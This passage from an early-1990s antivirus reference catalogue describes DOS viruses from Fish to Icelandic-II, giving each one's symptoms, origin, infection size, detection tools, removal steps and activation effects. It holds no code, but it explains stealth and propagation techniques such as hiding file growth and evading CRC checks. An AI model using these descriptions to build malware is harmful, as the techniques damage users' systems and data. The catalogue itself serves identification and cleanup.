              Toward A Better Tomorrow
              And a better Place To Live In"

             "03/03/90 KV KL MAL"

       This virus is believed to have originated in Kuala Lumpur, Malaysia.


 Virus Name:  Fish Virus
 Aliases:     European Fish Viruses, Fish 6, Stealth Virus
 V Status:    Rare
 Discovered:  May 1990
 Symptoms:    .COM & .EXE growth, monitor/display flickering, system
              memory decrease
 Origin:      West Germany
 Eff Length:  3,584  Bytes
 Type Code:   PRsAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, CleanUp V66+, Pro-Scan 1.4+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Fish Virus was isolated in May 1990.  At the time of isolation,
       it was reported to be widespread in Europe, and it is thought to
       have originated in West Germany.  It is a generic resident .COM
       and .EXE infector, and will infect COMMAND.COM.  This virus will
       remain memory resident thru a warm reboot, or Ctrl-Alt-Del.  The
       virus is encrypted, though infected programs can be found by
       searching for the text string "FISH FI" appearing near the end of
       the program.  The "FISH FI" string may later disappear from the
       program.

       The first time a program infected with the Fish Virus is executed,
       the virus will go memory resident, installing itself into the low
       available free memory.  If interrupt 13 has not been hooked by
       another program, it will hook interrupt 13.  If it can hook
       interrupt 13, it will take up 8,192 bytes in memory.  If the virus
       cannot hook interrupt 13 because another program is already using it,
       it will be 4,096 bytes in memory.

       When interrupt 13 is not hooked, and the virus is memory resident,
       the virus will cause a random warm reboot, thus allowing it to
       infect COMMAND.COM and hook interrupt 13.  Warm reboots do not
       appear to randomly occur after interrupt 13 has been hooked.

       After the virus is memory resident, all .COM and .EXE programs which
       are openned for any reason will be infected.  Infected programs
       increase in length by 3,584 bytes.  The increase in program size
       cannot be seen by listing the disk directory if the virus is in
       memory.  Also, if a CHKDSK command is run on an infected system,
       it will detect file allocation errors on infected files.  If CHKDSK
       is run with the /F option, it will result in lost clusters and
       cross-linking of files.

       The virus slows down video writes, and flickering of the monitor
       display can be noticed on an infected system.

       Anti-viral programs which perform CRC checking cannot detect the
       infection of the program by the Fish Virus if the virus is memory
       resident.  This virus can also bypass software write protect
       mechanisms used to protect a hard drive.

       The Fish Virus is a modified version of the 4096 Virus, though it is
       more sophisticated in that it constantly re-encrypts itself in
       system memory.  Viewing system memory with the virus resident will
       show that the names of several fish are present.

       It is unknown what the Fish virus does when it activates, though it
       does appear to check to determine if the year of the system time is
       1991.


 Virus Name:  Flash
 Aliases:
 V Status:    Rare
 Discovered:  July 1990
 Symptoms:    .COM & .EXE growth, decrease in available free memory,
              video screen flicker
 Origin:      West Germany
 Eff Length:  688  Bytes
 Type Code:   PRfA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V64+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Flash Virus was discovered in July 1990 in West Germany.  Flash
       is a memory resident generic file infector, and will infect .COM and
       .EXE files, but not COMMAND.COM.

       The first time a program infected with the Flash Virus is executed,
       the virus will install itself memory resident.   976 bytes will be
       allocated in high memory, and available free memory will decrease by
       a corresponding 976 bytes.  A mapping of memory will also indicate
       that when Flash is resident in memory, interrupts 00, 23, 24, 30,
       ED, F5, and FB are now in free memory.  Total system memory reported
       by DOS, as well as low memory used by the operating system and TSRs
       will not have changed.

       Once Flash is memory resident, each time a .COM or .EXE program is
       executed it is a candidate for infection.  An uninfected .EXE program
       will always be infected upon execution.  Uninfected .COM files are
       only infected if they are greater than approximately 500 bytes in
       length.  Infected files will always increase in length by 688 bytes.

       After June of 1990, systems with a graphics capable monitor may notice
       a screen flicker occurring at approximately seven minute intervals.
       The virus causes this effect by manipulating some screen blanking bits
       every seven minutes.


 Virus Name:  Flip
 Aliases:
 V Status:    Rare
 Discovered:  July 1990
 Symptoms:    .COM & .EXE growth; decrease in system and free memory;
              boot sector and partition table altered; file allocation errors
 Origin:      West Germany
 Eff Length:  2,343  Bytes
 Type Code:   PRhABKX - Parasitic Resident .COM, .EXE, Partition Table Infector
 Detection Method:  ViruScan V66+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V71+, Scan/D, or Delete infected files
 General Comments:
       The Flip Virus was discovered in West Germany in July 1990.  It is
       a generic file infector, and will infect .COM, .EXE, and overlay files.
       This virus will also infect COMMAND.COM, as well as alter the partition
       table and boot sector of hard disks.  It is important to note that the
       Flip virus is not infective from .COM files or boot sectors.

       The first time an EXE program infected with the Flip Virus is executed,
       it installs itself memory resident in high memory.  System memory as
       reported by the CHKDSK command as well as free memory will have
       decreased by 3,064 bytes.  At this time, the copy of COMMAND.COM
       located in the C: drive root directory will be infected, though no
       file length change will be apparent with the virus in memory.  The
       system's hard disk partition table and boot sector will also be
       slightly modified.  If the infected program was executed from a
       floppy, COMMAND.COM on the floppy will be infected, though the size
       change will be noticeable.

       After Flip becomes memory resident, any .COM or .EXE files executed
       will become infected.  Infected programs will show a file length
       increase of 2,343 bytes.  If a program is executed which uses an
       overlay file, the overlay file will also become infected.

       Systems infected Flip may experience file allocation errors resulting
       in file linkage errors.  Some data files may become corrupted.

       On the second of any month, systems which were booted from an infected
       hard disk and have an EGA or VGA capable display adapter may experience
       the display on the system monitor being horizontally "flipped" between
       16:00 and 16:59.

       Flip can only be passed between systems on infected .EXE files.
       Infected .COM files, and altered floppy boot sectors do not transfer
       the virus.

       Known variant(s) of Flip include:
       Flip B : Similar to the original Flip Virus, this variant has an
                effective length of 2,153 bytes.  Its memory resident portion
                at the top of system memory is 2,672 bytes.  The major
                difference between this variant and the original virus is
                that Flip B can infect programs from the hard disk partition
                table infection.
                Isolated: January, 1991.  Origin: Unknown.

 Virus Name:  FORM-Virus
 Aliases:     Form, Form Boot
 V Status:    Rare
 Discovered:  June 1990
 Symptoms:    BSC, clicking noise from system speaker
 Origin:      Switzerland
 Eff Length:  N/A
 Type Code:   BR - Resident Boot Sector Infector
 Detection Method:  ViruScan V64+, F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions: MDisk, or DOS SYS command
 General Comments:
       The Form, or Form Boot, Virus is a memory resident infector of
       floppy and hard disk boot sectors.  It was originally isolated in
       Switzerland.

       When a system is first booted with a diskette infected with the
       Form Boot virus, the virus will infect system memory as well as
       seek out and infect the system's hard disk.  The floppy boot may
       or may not be successful, on the author's test system, a boot
       from floppy diskette infected with Form Boot never succeeded,
       instead the system would hang.  It should be noted that the virus
       was received by the author of this document as a binary file, and
       it may have been damaged in some way.

       The following text message is contained in the Form Boot virus binary
       code as received by the author of this document:

            "The FORM-Virus sends greetings to everyone who's reading
             this text.FORM doesn't destroy data! Don't panic! Fuckings
             go to Corinne."

       These messages, however, may not appear in all cases.  For example,
       I did not find these messages anywhere on a hard disk infected with
       Form Boot.

       Systems infected with the FORM-Virus in memory may notice that a
       clicking noise may be emitted from the system speaker on the 24th
       day of any month.

       This virus can be removed with the same technique as used with many
       boot sector infectors.  First, power off the system and then boot
       from a known clean write-protected boot diskette.  The DOS SYS
       command can then be used to recreate the boot sector.  Alternately,
       MDisk from McAfee Associates may be used to recreate the boot
       sector.


 Virus Name:  Frere Jacques
 Aliases:     Frere Virus
 V Status:    Rare
 Discovered:  May 1990
 Symptoms:    .COM & .EXE growth, available memory decreases, system hangs,
              music (Frere Jacques) on Fridays
 Origin:      California, USA
 Eff Length:  1,808 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+
 Removal Instructions: Scan/D, Pro-Scan 1.4+, or Delete infected files
 General Comments:
       The Frere Jacques Virus was isolated in May, 1990.  It is a memory
       resident generic file infector, infecting .COM, .EXE, and Overlay
       files.  It does not infect COMMAND.COM.  This virus is based on
       the Jerusalem B Virus.

       The first time an infected program is executed, the virus will
       install itself memory resident in low available free memory.
       The memory resident virus occupies 2,064 bytes, and attaches itself
       to interrupt 21.  After becoming memory resident, Frere Jacques will
       infect any program which is then executed.  Infected programs will
       increase in size by between 1,808 bytes and 1,819 bytes, though
       .COM files always increase in size by 1,813 bytes.

       Systems infected with Frere Jacques will experience a decrease in
       available free memory, as well as executable files increasing in
       size.  System hangs will also intermittently occur when the virus
       attempts to infect programs, thus resulting in the possible loss
       of system data.

       On Fridays, the Frere Jacques virus activates, and will play the
       tune Frere Jacques on the system speaker.

       Also see: Jerusalem B


 Virus Name:  Friday The 13th COM Virus
 Aliases:     COM Virus, Miami, Munich, South African, 512 Virus
 V Status:    Extinct
 Discovered:  November, 1987
 Symptoms:    .COM growth, floppy disk access, file deletion
 Origin:      Republic of South Africa
 Eff Length:  512 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirHunt 2.0+, or F-Prot
 General Comments:
       The original Friday The 13th COM virus first appeared in
       South Africa in 1987.  Unlike the Jerusalem (Friday The 13th)
       viruses, it is not memory resident, nor does it hook any
       interrupts.  This virus only infects .COM files, but not
       COMMAND.COM.  On each execution of an infected file, the
       virus looks for two other .COM files on the C drive and 1
       on the A drive, if found they are infected.  This virus is
       extremely fast, and the only indication of propagation occurring
       is the access light being on for the A drive, if the current
       default drive is C.  The virus will only infect a .COM file
       once.  The files, after infection, must be less than 64K in
       length.

       On every Friday the 13th, if the host program is executed, it
       is deleted.

       Known variants of the Friday The 13th COM virus are:
       Friday The 13th-B: same, except that it will infect every
            file in the current subdirectory or in the system path if
            the infected .COM program is in the system path.
       Friday The 13th-C: same as Friday The 13th-B, except that the
            message "We hope we haven't inconvenienced you" is
            displayed whenever the virus activates.

       Author's note: All samples of this virus that are available were
       created by reassembling a disassembly of this virus.  These viruses
       may not actually exist "in the wild".


 Virus Name:  Fu Manchu
 Aliases:     2080, 2086
 V Status:    Rare
 Discovered:  March, 1988
 Symptoms:    .SYS, .BIN, .COM & .EXE growth, messages 
 Origin:      
 Eff Length:  2,086 (COM files) & 2,080 (EXE files) bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, VirexPC
 General Comments:
       The Fu Manchu virus attaches itself to the beginning of .COM
       files or the end of .EXE files.  This virus will infect any
       executable program, including overlay, .SYS, and .BIN files
       as well.  It appears to be a rewritten version of the Jerusalem
       virus, with a possible creation date of 3/10/88.

       A marker or id string usually found in this virus is
       'sAXrEMHOr', though the virus only uses the 'rEMHOr' portion
       of the string to identify infected files.

       One out of sixteen infections will result in a timer being
       installed, and after a random amount of time, the message
       "The world will hear from me again!" is displayed and
       the system reboots.  This message will also be displayed on
       an infected system after a warm reboot, though the virus doesn't
       survive in memory.

       After August 1, 1989, the virus will monitor the keyboard buffer,
       and will add derogatory comments to the names of various
       politicians.  These comments go to the keyboard buffer, so
       their effect is not limited to the display.  The messages within
       the virus are encrypted.

       This virus is very rare in the United States.

       Also see: Jerusalem B, Taiwan 3


 Virus Name:  Ghostballs
 Aliases:     Ghost Boot, Ghost COM
 V Status:    Extinct
 Discovered:  October, 1989
 Symptoms:    moving graphic display, .COM file growth, file corruption, BSC.
 Origin:      Iceland
 Eff Length:  2,351 bytes
 Type Code:   PNCB - Parasitic Non-Resident .COM & Boot Sector Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: MDisk or DOS SYS and erase infected .COM files,
       or CleanUp, F-Prot, Pro-Scan 1.4+, VirexPC, Scan/D/X, VirHunt 2.0+
 General Comments:
       The Ghostball virus (Ghost Boot and Ghost COM) were discovered in
       October, 1989 by Fridrik Skulason of Iceland.  The Ghostballs Virus
       virus infects generic .COM files, increasing the file size by
       2,351 bytes.  It also alters the disk boot sector, replacing it
       with viral code similar to the Ping Pong virus.  This altered
       boot sector, however, will not replicate.

       Symptoms of this virus are very similar to the Ping Pong
       virus, and random file corruption may occur on infected
       systems.

       The Ghostballs virus was the first known virus that could infect
       both files (.COM files in this case) and disk boot sectors.
       After the boot sector is infected, the system experiences the
       bouncing ball effect of the Ping Pong virus.  If the boot sector
       is overwritten to remove the boot viral infection, it will again
       become corrupted the next time an infected .COM file is executed.

       The Ghostballs Virus is based on the code of two other viruses.
       The .COM infector portion consists of a modified version of the
       Vienna virus.  The boot sector portion of the virus is based on
       the Ping Pong virus.

       To remove this virus, turn off the computer and reboot from
       a write protected master diskette for the system.  Then
       use either MDisk or the DOS SYS command to replace the boot
       sector on the infected disk.  Any infected .COM files must
       also be erased and deleted, then replaced with clean copies
       from your original distribution diskettes.


 Virus Name:  Golden Gate
 Aliases:     Mazatlan, 500 Virus
 V Status:    Extinct
 Discovered:  1988
 Symptoms:    BSC, disk format, Resident TOM
 Origin:      California, USA
 Eff Length:  N/A
 Type Code:   BRt - Resident Boot Sector Infector
 Detection Method:  ViruScan (identifies as Alameda)
 Removal Instructions: MDisk, F-Prot, or DOS SYS command
 General Comments:
       The Golden Gate virus is a modified version of the Alameda virus
       which activates when the counter in the virus has determined
       that it is infected 500 diskettes.  The virus replicates when
       a CTL-ALT-DEL is performed, infecting any diskette in the floppy
       drive.  Upon activation, the C: drive is formatted.  The
       counter in the virus is reset on each new floppy or hard drive
       infected.

       Known Variants of this virus are:
       Golden Gate-B: same as Golden Gate, except that the counter
           has been changed from 500 to 30 infections before
           activation, and only diskettes are infected.
       Golden Gate-C: same as Golden Gate-B, except that the hard
           drive can also be infected.  This variant is also known
           as the Mazatlan Virus, and is the most dangerous of the
           Golden Gate viruses.

       Also see: Alameda


 Virus Name:  Grither
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth; C: & D: drive disk corruption
 Origin:      United States
 Eff Length:  774 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM & .EXE Infector
 Detection Method:  ViruScan V72+
 Removal Instructions: Scan/D, Delete infected files
 General Comments:
       The Grither Virus was submitted in January, 1991, by Paul Ferguson
       of the United States.  This virus is a non-resident direct action
       infector of .COM files, including COMMAND.COM.

       When a program infected with Grither is executed, the virus will infect
       one .COM file in the current directory.  COMMAND.COM may become
       infected if it exists in the current directory.

       .COM programs infected with Grither will increase in length by 774
       bytes, the virus will be located at the end of the infected file.  The
       file's date and time in the disk directory will not be altered by the
       virus.

       The Grither Virus can be extremely destructive.  With a probability of
       approximately one out of every eight times an infected program is
       executed, the virus may activate.  On activation, Grither will overwrite
       the beginning of the C: and D: drives of the system's hard disk.
       Effectively, this corrupts the disk's boot sector, file allocation
       tables, and directory, as well as the system files.

       Grither is roughly based on the Vienna and Violator viruses.

       ViruScan V72 will identify Grither infected files as Vienna B, though
       it may also identify them as Violator in rare circumstances.


 Virus Name:  Groen Links
 Aliases:     Green Left
 V Status:    Rare
 Discovered:  March, 1990
 Symptoms:    .COM & .EXE growth; TSR; Music
 Origin:      Amsterdam, Holland
 Eff Length:  1,888 Bytes
 Type Code:   PRsA - Resident Parasitic .COM &.EXE Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Groen Links Virus was originally reported in Amsterdam, Holland,
       in March 1990.  This virus is a memory resident infector of .COM and
       .EXE files.  It does not infect COMMAND.COM.  It is a variant of the
       Jerusalem B virus, though is listed separately here as it is a different
       length and exhibits different characteristics.

       The first time a program infected with the Groen Links Virus is
       executed, the virus will install itself memory resident as a low
       system memory TSR of 1,872 bytes.  Interrupts 21 and CE will be hooked
       by the virus.

       After the virus is memory resident, it will infect .COM and .EXE files
       as they are executed.  Infected .COM files will increase in length
       by 1,893 bytes with the virus being located at the beginning of the
       file.  .EXE files will increase in length by 1,888 to 1,902 bytes with
       the virus located at the end of infected files.  As with many of the
       Jerusalem variants, this virus will reinfect .EXE files.  After the
       first infection, .EXE files will increase by 1,888 bytes on subsequent
       infections.  Infected files will contain the text string: "GRLKDOS".

       After the virus has been resident for 30 minutes, it may play
       "Stem op Groen Links" every 30 minutes.  The name of the tune translates
       to "Vote Green Left", Green Left being a political party in Holland.


 Virus Name:  Guppy
 Aliases:
 V Status:    Rare
 Discovered:  October, 1990
 Symptoms:    TSR, .COM growth, error messages, disk boot failures
 Origin:      United States
 Eff Length:  152 Bytes
 Type Code:   PRsCK - Resident Parasitic .COM &.EXE Infector
 Detection Method: Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Guppy Virus was submitted in late October, 1990 by Paul Ferguson
       of Washington, DC.  Guppy is a memory resident infector of .COM files,
       including COMMAND.COM.

       The first time a program infected with the Guppy Virus is executed, the
       virus will install itself memory resident as a low system memory TSR
       with interrupt 21 hooked.  Available free memory will decrease by
       720 bytes.

       After the virus is memory resident, any .COM file with a file length of
       at least 100 bytes (approximately) that is executed will become infected
       with Guppy.  Infected files will increase in length by 152 bytes, with
       two bytes added to the beginning of the .COM file, and 150 bytes added
       to the end of the file.  Infected files will also have their date/time
       stamps in the directory updated to the system date and time when the
       infection occurred.

       If COMMAND.COM is executed with Guppy memory resident, it will become
       infected.  If the system is later booted from a disk with a Guppy
       infected COMMAND.COM, the boot will fail and a "Bad or Missing Command
       Interpreter" message will be displayed.

       Some programs will also fail to execute properly once infected with
       Guppy.  For example, attempts to execute EDLIN.COM after it was
       executed on my system resulted in a consistent "Invalid drive or
       file name" message, and EDLIN ending execution.

       Infected files can be identified as they will end with the following
       hex character string: 3ECD211F5A5B58EA


 Virus Name:  Halloechen
 Aliases:
 V Status:    Rare
 Discovered:  October, 1989
 Symptoms:    TSR, .COM & .EXE growth, garbled keyboard input.
 Origin:      West Germany
 Eff Length:  2,011 Bytes
 Type Code:   PRsA - Resident Parasitic .COM &.EXE Infector
 Detection Method:  ViruScan V57+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: VirHunt 2.0+, Scan/D or delete infected files
 General Comments:
       The Halloechen virus was reported by Christoff Fischer of
       the University of Karlsruhe in West Germany.  The virus is
       a memory resident generic .COM & .EXE file infector which is
       reported to be widespread in West Germany.

       The Halloechen virus installs itself memory resident when the
       first infected program is executed.  Thereafter, the virus will
       infect any .EXE or .COM file which is run unless the resulting
       infected file would be greater than 64K in size, or the file's
       date falls within the system date's current month and year.
       Once a file has been determined to be a candidate for infection,
       and is less than approximately 62K in size as well as having a
       date outside of the current month and year, it is infected.
       In the process of infecting the file, the files size is first
       increased so that it is a multiple of 16 (ends on a paragraph
       boundary), then the 2,011 bytes of viral code are added.

       When infected files are run, input from the keyboard is garbled.


 Virus Name:  Happy New Year
 Aliases:     Happy N.Y., V1600
 V Status:    New
 Discovered:  December, 1989
 Symptoms:    TSR; .COM & .EXE Growth; Floppy Boot Sector altered;
              Boot failures; Bad or missing command interpretor message
 Origin:      Bulgaria
 Eff Length:  1,600 Bytes
 Type Code:   PRsAK - Resident Parasitic .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Happy New Year, or V1600, Virus was submitted in December, 1990.
       This virus is originally from Bulgaria, and is a memory resident
       infector of .COM and .EXE files.  It will infect COMMAND.COM.

       The first time a program infected with the Happy New Year Virus is
       executed, the virus will install itself memory resident as a 2,432
       bytes low system memory TSR.  Interrupt 21 will be hooked by the
       virus.  At this time, the virus will also make a slight alteration
       to the floppy boot sector, and infect COMMAND.COM.  Infected
       COMMAND.COM files will not show a file length increase as the virus
       will overwrite a portion of the hex 00 section of the file.  The
       altered floppy boot sector does not contain a copy of the virus, and
       is not infectious.

       Once Happy New Year is memory resident, it will infect .COM and .EXE
       programs as they are executed.  Infected programs will increase in
       length by 1,600 bytes and have the virus located at the end of the
       infected file.

       The following text message can be found in infected programs:

               "Dear Nina, you make me write this virus; Happy new year!"
               "1989"

       This message is not displayed by the virus.

       Systems infected with the Happy New Year Virus may fail to boot,
       receiving a "Bad or missing command interpretor" message if COMMAND.COM
       is infected on the boot diskette or hard drive.

       It is unknown if Happy New Year carries any destructive capabilities.

       Known variant(s) of Happy New Year are:
       Happy New Year B : Similar to Happy New Year, this variant has five
               bytes which differ from the original virus.  Unlike Happy
               New Year, COMMAND.COM will only be infected if it is executed
               for some reason.


 Virus Name:  Holland Girl
 Aliases:     Sylvia
 V Status:    Rare
 Discovered:  December, 1989
 Symptoms:    .COM growth, TSR
 Origin:      Netherlands
 Eff Length:  1,332 Bytes
 Type Code:   PRsC - Resident Parasitic .COM Infector
 Detection Method:  ViruScan V50+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, or Scan/D
 General Comments:
       The Holland Girl or Sylvia Virus was first reported by Jan
       Terpstra of the Netherlands.  This virus is memory resident
       and infects only .COM files, increasing their size by 1,332
       bytes.  The virus apparently does no other damage, and
       does not infect COMMAND.COM.

       The virus's name is due to the fact that the virus code
       contains the name and phone number of a girl named Sylvia
       in Holland, along with her address, requesting that post cards
       be sent to her.  The virus is believed to have been written
       by her ex-boyfriend.

       Also see: Holland Girl 2


 Virus Name:  Holland Girl 2
 Aliases:     Sylvia 2
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth
 Origin:      New Brunswick, Canada
 Eff Length:  1,332 Bytes
 Type Code:   PNC - Resident Parasitic .COM Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The Holland Girl 2, or Sylvia 2, Virus was discovered in New Brunswick,
       Canada in January 1991.  This virus is similar to the Holland Girl
       Virus, though it has been altered significantly.  This virus is a non-
       resident infector of .COM files, including COMMAND.COM.

       When a program infected with the Holland Girl 2 Virus is executed, the
       virus will infect up to four .COM files.  It first checks the C: drive
       root directory to look for candidate files, then the current drive and
       current directory.

       .COM Programs infected with the Holland Girl 2 Virus will increase in
       length by 1,332 bytes with the virus being located at the beginning of
       the infected program.  Infected programs will also contain the following
       text:

               "This program is infected by a HARMLESS Text-Virus V2.1"

               "Send a FUNNY postcard to : Sylvia"

                "You might get an ANTIVIRUS program....."

       Sylvia's last name, and full address are in the virus in plain text,
       and are not repeated here for privacy reasons.

       Also see: Holland Girl


 Virus Name:  Holocaust
 Aliases:     Stealth, Holo
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    decrease in system & available memory; file allocation errors
 Origin:      Barcelona, Spain
 Eff Length:  3,784 Bytes
 Type Code:   PRhCK - Resident Parasitic .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Holocaust Virus was submitted in December, 1990 by David Llamas of
       Barcelona, Spain.  Holocaust is a self-encrypting memory resident
       infector of .COM files, including COMMAND.COM.  This virus is qualifies
       as a Stealth virus as it hides the file length increase on infected
       files as well as infecting on file open and execution.

       The first time a program infected with the Holocaust Virus is
       executed, the virus will install itself memory resident.  It will
       reserve 4,080 bytes of high system memory below the 640K DOS boundary.
       This memory will be marked as Command Data, and interrupt 21 will be
       hooked.  Some memory mapping utilities will show the memory resident
       command interpretor to have grown by the 4,080 bytes, though it is
       actually in high memory instead of low memory.

       Once Holocaust is memory resident, it will infect COM programs which
       are executed or openned for any reason.  This virus, however, will not
       infect very small COM files of less than 1K in size.  Infected COM
       programs will increase in size by 3,784 bytes, though this file size
       increase will not be seen in a directory listing if the virus is
       memory resident.   The viral code will be located at the end of
       infected files.

       If the Holocaust Virus is memory resident and the DOS ChkDsk command
       is executed, infected files will be indicated as having a file
       allocation error.  Execution of the command with the /F parameter on
       systems with the virus memory resident will result in the infected
       files becoming damaged.  The file allocation errors do not occur if
       the virus is not in memory since at that time the directory size will
       match the file allocation in the FAT.

       The Holocaust Virus is a self-encrypting virus, and will occasionally
       produce an infected file which is encrypted differently from its
       original encryption mechanism.  Some infected files will contain the
       following text at the end of the program, while other samples will have
       this text encrypted:

               "Virus Anti - C.T.N.E. v2.10a. (c)1990 Grupo Holokausto.
                Kampanya Anti-Telefonica. Menos tarifas y mas servicio.
                Programmed in Barcelona (Spain). 23-8-90.
                - 666 -"

       Holocaust is reported by David Llamas to be widespread in Barcelona
       as of December, 1990.  It is not known if this virus activates, and
       what it does on activation.  It does not match a similar virus
       reported by Jim Bates of the United Kingdom named Spanish Telecom.


 Virus Name:  Hybryd
 Aliases:     Hybrid
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    .COM growth
 Origin:      Poland
 Eff Length:  1,306 Bytes
 Type Code:   PRhA - Resident Parasitic .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Hybryd Virus was submitted in January, 1991, and is from Poland.
       This virus is a non-resident direct action infector of .COM files,
       including COMMAND.COM.

       When a program infected with Hybryd is executed, the virus will
       look for an uninfected .COM program in the current directory.  If an
       uninfected program is found, the virus will infect it.  Infected
       .COM programs will have a file length increase of 1,306 bytes, the
       virus will be located at the end of the infected program.  This virus
       alters the file time so that the seconds field in the file time is 62,
       the indicator that the file is infected.  Just viewing the directory,
       though, it appears that the file date and time has not been altered.

       The following text strings are contained within the Hybryd Virus, though
       they cannot be viewed in infected files as they are encrypted:

               "(C) Hybryd Soft
                Specjalne podziekowania dla
                Andrzeja Kadlofa i Mariusza Deca
                za artykuly w Komputerze 11/88"

       In the submitted sample, the one text string that is not encrypted is
       the following, which is also found in replicated samples:

               "Copyright IBM Corp 1981,1987
                Licensed Material - Program Property of IBM"

       This string should not be taken to indicate that IBM necessarily had
       anything to do with the creation of this virus.

       On Friday The 13ths starting in 1992, this virus will overwrite the
       current drive's boot sector when an infected program is executed.  It
       may also corrupt program files at that time when they are executed.


 Virus Name:  Hymn
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM & .EXE growth; decrease in system and available free memory
 Origin:      USSR
 Eff Length:  1,865 Bytes
 Type Code:   PRhA - Resident Parasitic .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Hymn Virus was submitted in December, 1990, and originated in the
       USSR.  This virus is a memory resident infector of .COM and .EXE files,
       and will infect COMMAND.COM.

       The first time a program infected with the Hymn Virus is executed, the
       virus will install itself memory resident at the top of system memory
       but below the 640K DOS boundary.  The DOS ChkDsk program will show that
       total system memory and available free memory have decreased by 3,712
       bytes.  This virus does not move the interrupt 12 return.  COMMAND.COM
       will also become infected at this time.

       Once Hymn is memory resident, it will infect .COM and .EXE files which
       are over approximately 2K in length when they are executed or openned
       for any reason.  Infected .COM files will increase in length by
       1,865 bytes.  Infected .EXE files will have a file length increase of
       1,869 to 1,883 bytes.  In both cases the virus will be located at the
       end of the infected file.

       Infected programs will contain two text strings within the viral code:
               "ibm@SNS"
               "@ussr@"

       It is not known what Hymn does when it activates, but it is assumed
       from the name that under some conditions it may play music.


 Virus Name:  Icelandic
 Aliases:     656, One In Ten, Disk Crunching Virus, Saratoga 2
 V Status:    Extinct
 Discovered:  June, 1989
 Symptoms:    .EXE growth, Resident TOM, bad sectors, FAT corruption
 Origin:      Iceland
 Eff Length:  656 bytes
 Type Code:   PRfE - Resident Parasitic .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+
              VirHunt 2.0+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B, F-Prot,
              VirHunt 2.0+
 General Comments:
       The Icelandic, or "Disk Crunching Virus", was originally
       isolated in Iceland in June 1989.  This virus only infects
       .EXE files, with infected files growing in length between
       656 and 671 bytes.  File lengths after infection will always
       be a multiple of 16.  The virus attaches itself to the end
       of the programs it infects, and infected files will always
       end with hex '4418,5F19'.

       The Icelandic virus will copy itself to the top of free memory
       the first time an infected program is executed.  Once in high
       memory, it hides from memory mapping programs.  If a program
       later tries to write to this area of memory, the computer will
       crash.  If the virus finds that some other program has "hooked"
       Interrupt 13, it will not proceed to infect programs.  If
       Interrupt 13 has not been "hooked", it will attempt to infect
       every 10th program executed.

       On systems with only floppy drives, or 10 MB hard disks, the
       virus will not cause any damage.  However, on systems with
       hard disks larger than 10 MB, the virus will select one unused
       FAT entry and mark the entry as a bad sector each time it
       infects a program.

       Also see: Icelandic-II, Icelandic-III, Mix/1, Saratoga


 Virus Name:  Icelandic-II
 Aliases:     System Virus, One In Ten
 V Status:    Extinct
 Discovered:  July, 1989
 Symptoms:    .EXE growth, Resident TOM, FAT corruption
              date changes, loss of Read-Only
 Origin:      Iceland
 Eff Length:  632 Bytes
 Type Code:   PRfE - Parasitic Resident .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B, F-Prot,
              VirHunt 2.0+
 General Comments:
       The Icelandic-II Virus is a modified version of the Icelandic
       Virus, and was isolated for the first time in July 1989 in
       Iceland.  These two viruses are very similar, so only the
       changes to this variant are indicated here, refer to Icelandic
       for the base virus information.

       Each time the Icelandic-II virus infects a program, it will
       modify the file's date, thus making it fairly obvious that
       the program has been changed.  The virus will also remove
       the read-only attribute from files, but does not restore it
       after infecting the program.

       The Icelandic-II virus can infect programs even if the system
       is running an anti-viral TSR that monitors interrupt 21, such
       as FluShot+.

       On hard disks larger than 10 MB, there are no bad sectors
       marked in the FAT as there is with the Icelandic virus.

